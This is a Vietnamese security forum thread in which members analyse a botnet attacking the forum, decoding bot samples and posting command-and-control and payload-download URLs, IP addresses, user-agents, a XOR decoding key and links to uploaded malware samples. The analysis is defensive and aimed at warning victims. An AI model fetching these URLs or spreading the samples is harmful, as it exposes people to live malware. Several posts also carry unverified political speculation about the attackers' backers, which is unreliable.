Em nhìn cái link của anh mà em buồn cười quá =)) =)) Cười như điên lúc nửa đêm. Như em nói đó, công nghệ tạo ra malware đang đi trước chúng ta, và các hãng AV. Các hãng cứ quảng cáo mình lắm tài, nhiều công nghệ tiên tiến nhưng mà đấy, submit mẫu cho thì lai bảo clean. Đến cả AV cài trên máy, hook kinh hoàng, driver đủ kiểu, Chữ kí chữ cọt, Emulator, Heuristic, điện toán đám ma... mà có ăn thua đâu Nói chung là lởm như nhau thôi, chả cái AV nào tốt, lại còn chậm máy, thi thoảng lại dở chứng . Nhìn log của các bạn như KIS thì nản, dài dòng, tuỳ chọn vô biên nhưng mà để làm gì, vô dụng cả thôi =)) Em quen dùng cái av em thích nhất là VMWare, duyệt web vô tư,download thì toàn từ trang chủ, check kĩ, crack thì toàn RCE ra, xem patch thế nào, thì code lại, keygen cũng thế....Nói chung là an toàn tuyệt đối. Tất nhiên có bác sẽ nói em phải đầu tư RAM với ổ cứng, nhưng mà các bác ạ, dùng AV thì cũng thế thôi, như bạn BIT, sắp lên 1GB database rồi đấy, bạn nào chả chiếm ram, tương đương máy ảo thôi. Trong máy ảo em có cả Microsoft Word nhé -:|-

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Anh TQN rãnh viết Ebook RCE phổ biến cho mọi ngừoi luôn nhé anh :D Còn nữa, chưa thấy nhà báo nào tóm lược quá trình vạch mặt bọn STL này cả. Có ai xung phong viết 1 bài ngắn gọn dễ hiểu ko. Khi đó mới Copy vào mấy diễn đàn đc

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@acoustics89: trong vài ngàn người thì có 1 người làm được những điều như a. @TQN: hehe

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

ptv_vbhp wrote:

TQN wrote:

Em cạch, không dám tin tưởng 100% vào các AVs nữa.
Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ :D . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ :P

Trước khi em cho bkav chén mấy con bọ, em có cập nhật virus def của bkav không hay chỉ dùng bản cũ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Bản virus def là gì hả anh ? Em vẫn dùng bản cũ trong đó có mẫu .idx em thấy bị chém lâu lâu rồi hay sao ý ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

KMVN — GMT

ptv_vbhp wrote:

Bản virus def là gì hả anh ? Em vẫn dùng bản cũ trong đó có mẫu .idx em thấy bị chém lâu lâu rồi hay sao ý ?

Definition em, nhưng mà phát biểu thì phải cẩn trọng nhé.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Hic là sao hả anh :((

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Code:

URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC - Chưa chết, nhưng forbidden.
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General

Down images.gif về, xor toàn bộ content với 0x19, ra ông nội bot mới: Code:

File AcrobatUpdater.exe:
Size = 315392 bytes
MD5 = 5EA82DD32A7ECA5FDDAFE7D4A7F5E82D

Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL: Code:

Host: second.dinest.net
IP: 193.106.175.68
User-Agent: An0nym0453
xv.jpg: 2011-07-28 09:46:58
xc.jpg:

Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với. Cảnh báo như vậy mà vẫn không nhúc nhích gì à ? PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác. Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá) File mẫu bot mới up ở: http://www.mediafire.com/?f1xiq71cpfe7ej4

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Từ 11h tới giờ em ngồi lỳ trên máy, debug hết lại BackupSvc, MsHelpCenter mới và cũ. Có 2 bản MsHelpCenter. 1. Bản mới: build 27/12/2010 2. Bản cũ: 22/11/2010. Bản mới mang trong nó các URL sau: Code:

URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General

Bản cũ: Code:

URL1: http://tongfeirou.dyndns-web.com/banner1.png?cpn=ABC
URL2: http://biouzhen.dyndns-server.com/banner1.png?cpn=ABC
URL3: http://maowoli.dyndns-free.com/banner1.png?cpn=ABC
User-Agent: Gozilla_2/General

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Domain Name: DINEST.NET Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 27-Jul-2011 Expiration Date: 27-Jul-2012

Mới cứng. Lần này các bạn STL mò về IQHost của Russia Federation ;).

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Hiện tại CMC đã diệt đươc MsHelpCenter, nhưng BackupSvc thì vẫn chưa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

TQN wrote:

Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với. Cảnh báo như vậy mà vẫn không nhúc nhích gì à ?

Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

template wrote:

Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?

Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được? Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

latlaobao wrote:

template wrote:

Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?
Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được? Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn.

Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ytylk — GMT

Các anh ở ngoài sáng, còn chúng nó ở trong tối. Thật là bẩn thỉu! Các anh hãy cẩn thận trong cuộc sống và công việc ngoài đời nếu ở VN. Chúng xài luật rừng bẩn thỉu lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

template wrote:

Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.

Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốt:D) qua các forum mà mình tham gia.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

Ở ĐÂY TÔI KÊU GỌI NHỮNG NGƯỜI CÓ TẦM ẢNH HƯỞNG LỚN NÊN PUBLIC THÔNG TIN NÀY RA. NHẤT LÀ BỌN SINH ZIÊN IT. TỐI NGÀY CỬ LŨI ĐẦU VÀO GAME

Phân tích tính chất vài trận DDoS HVA vừa qua.

Semperidem — GMT

Em không dám có ý kiến gì về kĩ thuật. :D Nhưng xin các anh viết giúp em một cái thông điệp ngắn gọn đầy đủ về phát hiện, diệt mấy cái file này, em không dám viết vì vấn đề kĩ thuật. Tụi em có yahoo, facebook, email, thậm chí có phần mềm tìm email em cũng có thể nhận tìm và spam email thông tin này. :D có chút công sức mọn xin góp cùng mọi người :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Sophos trả lời trước tiên (30 phút sau khi gởi):

Thank you for contacting Sophos Technical Support. **Please note that this is an automated response. If you have any questions, require assistance or clarification on this analysis, please feel free to reply to this email quoting this case number in the subject line.** The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly. AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A) jarlib.dll -- clean AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A)

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

latlaobao wrote:

template wrote:

Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.
Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốt:D) qua các forum mà mình tham gia.

Mình có theo dõi topic này từ đầu luôn, đã kiểm tra bảng Unikey cty mình trên VirusToTal thấy có Trojan và Malware, nhưng sao em kiểm tra không cỏ 3 ip tĩnh của cty trong danh sách của chú Conmale. Công ty em không cho download file gì hết. Mấy ngày nay, ở cty cũng như ở nhà, em điều vô topic này theo dõi để có thông tin gì thì gửi spam qua yahoo messenger cũng như gửi mail cho mọi người về những cách mà các chú, các anh đã nêu để mọi người biết tìm cách diệt malware bot này. Chắc phải tóm tắt lại nội dung lại rồi để lên facebook và để status YM! quá. Có sư huynh nào giúp tóm tắt nội dung dùm để mọi người đồng loạt loan tin với. Cảm ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tunghoang — GMT

Chào mọi người Tôi có kiểm tra các danh sách IP mà anh comale up thì không thấy có IP của mình trong đó. Nhưng scan thử trên Virustotal file unikey cài trong máy thì được kết quả sau: http://www.virustotal.com/file-scan/report.html?id=59d4e7d2160a63714a5a9dfe201b7eb4bda81cc13db3c7678e5e58661e1704c8-1311855400 Vậy tôi gửi các bạn file này kèm theo boot log và log autoruns của máy tôi để các bạn phân tích Unikey + Autoruns: http://www.mediafire.com/myfiles.php# Boot log: http://www.megaupload.com/?d=KGCFDGBF Tạm thời tôi không xoá bất cứ file nào trên máy, nếu còn cần thông tin gì thêm tôi sẵn sàng cung câp.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

File AcrobatUpdater.exe, con bot mới của tụi bán nước stl, được build vào ngày hôm qua: 27/07/2011, lúc 11h. Chắc các anh stl đọc thấy bài post tuyên bố thắng lợi của em nên mấy anh căm lắm phải không ? À, bây giờ tao build bot mới đã, đăng ký host mới bên Nga ngay, sáng mai, 9h:48phút, mày biết tay tao, tụi HVA và thằng RCE "nữa mùa" TQN, phải mấy anh nghĩ vậy không, mấy anh stl. Build gấp quá nên code từ User-Agent, hàm giải mã, mấy anh vẫn để nguyên xi. Em cứ dùng code decode cũ của acourxxx thì giải mã ra file config của mấy anh. Mấy lần rồi, mấy anh set targe chỉ 1 mình HVA, enable = 1 mới chết chứ. Mấy anh có thấy mấy anh hèn hạ, chơi bẩn lắm không ? Đường đường chính chính đối mặt người ta không được, mấy anh huy động cái đám zombie còn lại của mấy anh chơi ném đá hội đồng HVA à ? Lần này sinh thread để connect mới dữ chứ, trên 10 thread, mỗi thread 1 port, kinh thế. VB mà cũng biết dùng multithread à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Có danh sách xxx ngàn IP tấn công HVA. Nếu vị HVA's ở ISP nào có lòng, nên huy động nguồn lực để triệt nguồn này tới HVA. Ý kiến cá nhân. Còn ý kiến công cộng cho các vị viết báo, nên viết một đợt báo nói về mạng BOTNET đang tấn công có chủ đích tới các chủ thể có tiếng tăm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tại sao bolzano_1989 phải đăng ký nick mới tunghoang để post bài chứ ? CMC có áp lực cho em à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

;)). Nick đó từ năm 2004 đó bà con TQN.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tunghoang — GMT

TQN wrote:

Tại sao bolzano_1989 phải đăng ký nick mới tunghoang để post bài chứ ? CMC có áp lực cho em à ?

http://www.virustotal.com/file-scan/report.html?id=59d4e7d2160a63714a5a9dfe201b7eb4bda81cc13db3c7678e5e58661e1704c8-1311855400 Chắc TQN xem link trên và thấy bolzano_1989 comment phía dưới nên nghĩ như vậy. Tôi là người ngoại đạo, công việc của tôi không liên quan gì đến IT. Tôi và bolzano_1989 là 2 người khác nhau.

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

"Microsoft đã phối hợp với các doanh nghiệp, trường đại học và chính quyền Mỹ thực hiện chiến dịch B107 tiêu diệt Rustock, một trong những mạng botnet lớn và nguy hiểm nhất hành tinh." Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay!

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Bây giờ chưa có mẫu mới hả anh, vẫn cái kia nó dos, lại còn post dòng này, bực quá. Code:

mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

crc32 wrote:

"Microsoft đã phối hợp với các doanh nghiệp, trường đại học và chính quyền Mỹ thực hiện chiến dịch B107 tiêu diệt Rustock, một trong những mạng botnet lớn và nguy hiểm nhất hành tinh." Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay!

Muốn làm chiến dịch như vậy thì phải có sự phối hợp giữa "TQN" và "người bị dính chưỡng" và "chính phủ" 1. NGười dính chưỡng cung cấp thông tin lây nhiễm để "TQN" cập nhật thông tin. Yêu cầu tính tự giác . 2. "TQN" viết tool cập nhật liên tục các mẫu. 3. Tiến hành dùng TOOL của "TQN" để quét trên diện rộng hệ thống dính chưỡng. 4. Tiến hành theo dõi diện rộng việc tung chưỡng của sờ tờ lờ. Từ ISP, từ nạn nhân khốn khỗ HVA, từ các nạn nhân có nghi ngờ bị sờ tờ lờ quất khác. 5. Cùng nhau hạ quyền user xuống dưới mức át mi nít chây sần. Và thay đổi tư duy sài account. 6. Liên tục đăng tin khuyến nghị để mọi người biết để tham gia diệt zombies. ... Ý cùn cá nhân.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ủa, nick của em là TQN thì cứ viết là TQN: T = Thằng, Q = Cu, N = Anh, chứ cớ tại sạo cứ kẹp em trong cặp ngoặc kép "" chi vậy ha ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mechk — GMT

Trong bộ font setup của mình có chú vietkey này, đã check trên virustotal, kết quả là dính chấu: http://www.virustotal.com/file-scan/report.html?id=7d78ed62e1ff3729f33601a177c6fcc4e0d5bd8c0b6369fbf03773a8fac4e596-1311865002 Đây là kết quả phân tích mới nhất. Mình có thử đáp nó vào máy ảo và cả máy thật để kiểm tra lại xem có kết nối nào lạ ko, nhưng đều ko run được (có thể do OS của mình là Win7 64) Mình cũng ko chắc lắm có phải là virus của stl ko, RCE thì mù tịt :), cho vào hex editor thì chỉ đọc được dòng Cannot run in dos mode gì gì đó. Up lên các bác rảnh thì xem qua nhé :) http://www.mediafire.com/?o45llc19dat4964

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

tunghoang xem và cập nhật lại đường link mediafire tải mẫu Unikey và log của bạn nhé.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tunghoang — GMT

Autoruns: http://www.mediafire.com/?m65441j2z1b94mz Unikey: http://www.mediafire.com/?ejodr9dwxs1dwnn

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

..................... Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL: Host: second.dinest.net IP: 193.106.175.68 User-Agent: An0nym0453 xv.jpg: 2011-07-28 09:46:58 xc.jpg: ..................................... PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác. Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá)

Đây là master webserver mới đang điều khiển cuộc tấn công DDoS vào HVA.Từ 9h sáng đến khoảng 6.30 chiều nay, HVA bị tấn công nặng nề. Sử dung cả 2 đường cáp quang của VNPT và một kết nối 3G, mà tôi không thể nào vao đươc HVA post bài. Sự phát hiện kịp thời các master website đang in-charge (đang làm nhiệm vụ điều khiền mang bot) là một điều rất quan trong, để có biện pháp ứng phó kịp thời. Đúng là webserver có tên miền second.dinest.net cho đến giờ này còn đang điều khiển mạng STL bot. Mang bot đang tập trung tấn công vào HVA. Tuy nhiên khoảng sau 6.30 chiều nay master webserver này thỉnh thoảng có lúc ngừng một thời gian. Webserver second.dinest.net này có một số đăc điểm cần lưu ý: 1-Có rất it file trong hdocs (bình thường chỉ có 1 file index.html trống rỗng dung lượng chỉ khoảng 1KB và 1,2 file ảnh .jpg. Đây là các file ảnh nhúng vào các lệnh điều khiển mang bot , được mã hoá. Dung lương các file này cũng nhỏ, chỉ vài chục KB.) Nhưng webserver này sử dụng hẳn một IP tĩnh riêng cho nó (193.106.175.168). Trên webserver, như tôi đã viết, chỉ hosting 1 website duy nhất là master website, điều khiển mang bot. Quả thật là nhóm STL lắm tiền nhiều của. STL thường thiết lập các webserver chỉ chứa một website. trong đó cũng rất ít dữ liệu (file), chỉ dùng với mục đích điều khiển mang bot hay thu thập, lấy cắp thông tin cá nhân của người dung thông qua mang bot 2- Webserver second.dinest.net này cài Linux Debian, web server là Apache 2.2.9 (Note: version Apache mới nhất là 2.2.17, như đang cài trên các webserver tôi quản lý). Webserver này chỉ thường xuyên mở 2 cổng là 80 TCP HTTP và công 22 SSH TCP (service SSH-2.0 OPENSSH_5.1p1 Debian-5). Rất khó mới tìm ra được các service tại các cổng. Service SSH thỉ STL dùng để remote control webserver này từ xa (từ xa là từ VN hay TQ chẳng hạn) 3-Có một điều đặc biệt là webserver này mở rất nhiều cổng UDP mà tôi không hiểu lý do từ đâu. Có lúc tôi thấy webserver mở tới 22 cổng UDP (có cả công 53 UDP dùng config. DNS). Tôi chắc là họ chưa có kinh nghiệm trong việc bảo mật webserver và config. nó. Việc này sẽ mang đến những hậu quả không ngờ cho các bác STL. Như thế nào thì không tiện nói, hay không nên nói. 4- Đúng như anh conmale đã viết, webserver này đặt tai Nga (Russian). Vị trí địa lý của nó là ở gần giữa nước Nga, gần Mông cổ hơn cưc bắc Nga và ở phía Đông Bắc tỉnh Krasnoiac. Xin em bản đồ.

Thêm một bằng chứng về sự liên hệ của STL với một số thành phần Nga. Nhưng mối liên hệ này không có gì đáng nói so với một môi liên hệ khác với Nga, mà tôi đã nói ở trên. Tuy nhiên dải IP 193.106.175.0-193.106.175.255 lai có thể do một công ty Pháp sở hữu. Có thể công ty Pháp này đầu tư vào miền trung nước Nga, một vùng còn chậm phát triển. Có thể TQ cũng tham đầu tư liên doanh với Pháp, xây dựng các kết cấu hạ tâng IT tai đây. 5- Domain second.dinest.net là subdomain của domain dinest.net. Nhưng không chỉ có subdomain này, mà còn những subdomain khác. Chúng là:

- fpt.dinest.net IP 67.19.72.202 - irc.dinest.net IP 67.19.72.202 - mail.dinest.net IP 67.19.72.202 - www.dinest.net IP 67.19.72.202 - blog.dinest.net Ip 98.124.253.253

Các subdomain này có thể là do các chiến hữu của STL quản lý, chính xác hơn là của các cấp lãnh đạo. Dễ dàng nhận thấy subdomain mail.dinest.net là quan trong nhất. Tại đây một mailserver được thiết lâp, dùng cho việc liên hệ trong khối. 6- Webserver second.dinest.net được cấu hình để các kết nối từ trình duyệt của các user-nạn nhân từ các máy zombie của họ đến webserver là các persistent connection (hay còn gọi keep-alive connection). Điều này giup cho các bot trong zombie dễ dàng, nhanh chóng liên hệ với webserver và nhận lệnh lấy cắp thông tin cá nhân, tấn công DDoS các muc tiêu trên mang. Điều này anh conmale cũng đã đề câp trong một post phía trên. 7- Trước webserver second.dinest.net STL còn đặt một server cài phần mềm "NGINX"(đọc là en-din-x), nhằm phòng và hạn chế tác hại của quá trình phản công DDoS vào webserver (second.dinest.net). Biện pháp này vừa qua Vietnamnet.net cũng đã áp dụng khi bị tán công DDoS dồn dâp trên mạng. (Chắc cũng là do STL tấn công thôi. Ở Việt nam, ngoài STL thì không ai có đủ tìền bạc, nhân lực, thời gian và trình độ kiến thức tạo lập được 1 mạng zombies-bot với hàng trăm ngàn máy, đặt trong nước ngoài nước, tấn công DDoS liên tục, năng nề vào Vietnamnet. Lý do Vietnamnet bị STL tấn công là do đây là tờ báo lề phải duy nhất dám chửi, phê phán khá mạnh mẽ hành động, ngang ngược bá quyền của TQ mà thôi. Các báo khác luôn tìm cách né tránh) "NGINX" do một chuyên viên IT người Nga soạn thảo ra. Hiêu quả thưc tế của phần mềm-application này trong việc chống DDoS còn đang đươc bàn cãi. Chưa có công ty Mỹ nào dùng "NGINX" cả. Thưc tế "NGINX" cũng đã gây ra một vài trục trặc trên mang. Tôi cũng đã có một bài viết phân tích cụ thể hơn về "NGINX" tai topic " Sinh tử lênh.......", trong box "Những thảo luận khác" Chúng ta đã nắm đươc các thông tin cần thiết về master webserver second.dinest.net và nhiều webserver khác của STL. Chúng vẫn có những điểm yếu. Chúng ta cần và hoàn toàn có thể phát hiện ra các master webserver của STL sớm, ngay từ khi chúng khởi đông các cuộc tấn công DDoS trên mạng, nhằm phá hủy kết cấu hạ tầng và hoạt đông thông tin mang của cộng đồng, đất nước. Bằng các cách thức từ đơn giản nhất, ai cũng có thể làm, đến các phương thức tinh vi nhất (nhiều hàm lượng trí tuệ), trong một tâp thể HVA đồng tâm hiệp lực vì công đồng, đất nước, chúng ta có thể sẽ bẻ gẫy hay hạn chế tối đa tác hai của các cuộc tấn công DDoS trên mang của STL. Không thể để STL tự tung tự tác, như ở chỗ không người, muốn hạ nhục ai thì hạ, muốn cho website nào ngừng thì phải ngừng. Tôi sẽ gừi anh conmale một số biện pháp cần thiết, mang tính sáng tạo của người VN-"nghèo nhưng không ngu và hèn", để bàn bạc thưc hiện cùng với các bạn.(Không thể bàn công khai trên forum)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Đám STL này càng quậy, tớ càng có cảm giác đây là một đám người không biết tuổi tác ra sao nhưng lại rất tự ái, hiếu thắng và nhỏ nhen. Có hàng loạt những biểu hiện của những con người hành động không phải vì mục tiêu to lớn mà chỉ muốn trả đũa bằng mọi cách, biểu hiện của những người chưa trưởng thành. Công bố chiến công của các bạn STL luôn để các bạn bớt bực dọc và tự ái nhá. Hôm qua lần đầu tiên các bạn làm treo con server của HVA bên nhánh bên Nhật đó. Có lẽ traffic đi từ Việt Nam được route đến con server bên Nhật nhiều hơn vì nó "short path". Dù gì đi chăng nữa, các bạn vẫn chưa thể chơi HVA đến mức thê thảm như vietnamnet trước đây. Các bạn đã vài lần dốc toàn lực của botnet để dập HVA, một forum vô vụ lợi và "self-funded" nhưng kết quả ra sao thì ai cũng thấy rồi đó. Các bạn STL muốn kiến tạo cái gì với hàng loạt những hành động đầy phạm pháp và vô đạo đức? Nếu các bạn cho rằng vì "chính nghĩa" bảo vệ niềm tin và chế độ của các bạn mà phải làm như vậy thì các bạn hãy nghĩ lại xem: niềm tin và chế độ ấy tốt đẹp đến mức nào khi được một đám người "bảo vệ" bằng những hành động như các bạn đã và đang làm? Tổng kết lại thì các bạn đã làm gì? Các bạn ăn cắp, mạo danh, phá hoại tài sản của người khác, bôi nhọ hết người này đến người khác, phát tán và sử dụng những phương tiện độc hại. Trên mạng, hoạt động của các bạn có đầy đủ các biểu hiện như một nhóm "tin tặc" mũ đen đúng nghĩa, có nghĩa là các bạn cố giấu danh tánh, di chuyển liên tục và sử dụng những dịch vụ nổi tiếng đen tối và độc hại. Các bạn không nhận thấy rằng cả giới IT lẫn không IT đang phỉ nhổ và khinh bỉ các bạn hay sao? Nước Việt Nam và người Việt Nam chưa hề suy đồi đến mức dẫn đến đa số ủng hộ các bạn. Bởi vậy, những việc làm của các bạn chỉ làm tệ hại hơn niềm tin và hình ảnh các bạn đang cố bảo vệ. Về khía cạnh kỹ thuật, các bạn thừa biết rằng từ nay về sau, mỗi khi các bạn tung ra một con malware và bắt đầu phá hoại thì lúc lấy những thành viên ở HVA này sẽ theo sát các bạn. Hãy tự nhìn lại những gì mình làm để sau này, khi nghĩ lại còn thấy có một chút tự hào thay vì xấu hổ và nhục nhã, ngoại trừ trường hợp các bạn cho rằng những việc làm của các bạn là chính nghĩa, đạo đức và ích lợi thì không kể.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Microsoft là nhóm thứ nhì hồi âm (lúc 10:12pm giờ VN) về con "AcrobatUpdater.exe":

The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 7/28/2011 3:18:31 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11072810468966 Submitted Files ============================================= AcrobatUpdater.exe [Worm:Win32/Rebhip.A]

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

Anh conmale full stress với STl rùi kìa ;)) Bọn nó phá, cũng không thể phá mãi. Càng phá bọn nó càng nhục, nhục rồi đến lúc nội bộ lục cục mà tan rã :)) Vụ này làm cho các thành viên trong HVA mệt mỏi, sau vụ này liệu anh TQN, conmale, PXMMRF, ... có định đi nghỉ mát không các anh ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

.lht. wrote:

Anh conmale full stress với STl rùi kìa ;)) Bọn nó phá, cũng không thể phá mãi. Càng phá bọn nó càng nhục, nhục rồi đến lúc nội bộ lục cục mà tan rã :)) Vụ này làm cho các thành viên trong HVA mệt mỏi, sau vụ này liệu anh TQN, conmale, PXMMRF, ... có định đi nghỉ mát không các anh ?

Cũng không có gì mệt mỏi đâu em. Cùng lắm thì HVA bị gián đoạn khi này, khi kia thôi. Chắc member cũng thông cảm vì ai cũng có công việc, trách nhiệm, đời sống riêng nữa :) . HVA cứ đường đường chính chính còn những kẻ phá hoại cứ tiếp tục chui nhủi. Mỗi lần bị động ổ là lại mất server, mất tên miền, tốn kém.... Những trò phá hoại không thấy kết quả gì mà chỉ mang tiếng nhục vào thân. Đến một lúc nào đó, những con người "ảo" lẩn trốn đằng sau những trò phá hoại được "bạch hoá" thì sẽ sống với ai? Ngay lúc này, lại là mấy trò đấm vô /hvaonline/forums/list.html và /hvaonline/portal/list.html và mà không biết mệt. Nghĩ cũng lạ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Riêng em thì nghĩ đám này cũng chẳng tiêu tốn bao nhiêu tiền bạc vào chi phí server, domain đâu. Bọn này làm được những trò nhơ như thế này, thì việc dùng tiền của người khác mua server, domain đâu phải là khó :D. P/S: Rồi đâu sẽ vào đấy, chỉ khi không làm thì người khác mới không biết, đi đêm có ngày gặp ma mà :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Lại thêm một biến thể mới nữa của AcrobatUpdater.exe xuất hiện, mới sáng nay. Thêm nữa, quan trong: Host speed.cyline.org đã được stl ra lệnh sống dạy. Thằng nằm vùng uxtheme.manifest được lệnh down 2 file bmp từ file này. Cách đây thời gian ngắn, em đã post link của nó, nay sinh phép post lại: Code:

URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca

URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf

uxtheme.manifest giải mã flower.bmp cho ra link BlueSphere. Giãi mã tiếp BlueSphere.bmp cho ra 1 exe rỗng. Hôm nay, 29_07_2011, cũng flower.bmp đó, uxtheme.manifest giải mã cho ra: Code:

http://speed.cyline.org:443/plxzyin0fx.bmp

Cái bóng này bự bà cố luôn, giải mã ra 1 exe như Fake Unikey 1, nhưng trong resource lại chưa có gì ? Hết hàng rồi à mấy anh stl ? Hay đang đợi coder code đống "mèo què" khác ! Toàn bộ em up ở đây: 1. FakeUnikey_29_07_2011: http://www.mediafire.com/?k29pqgh8mym4oja 2. AcrobatUpdater_29_07_2011: http://www.mediafire.com/?xzbmds3fob2q39s

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

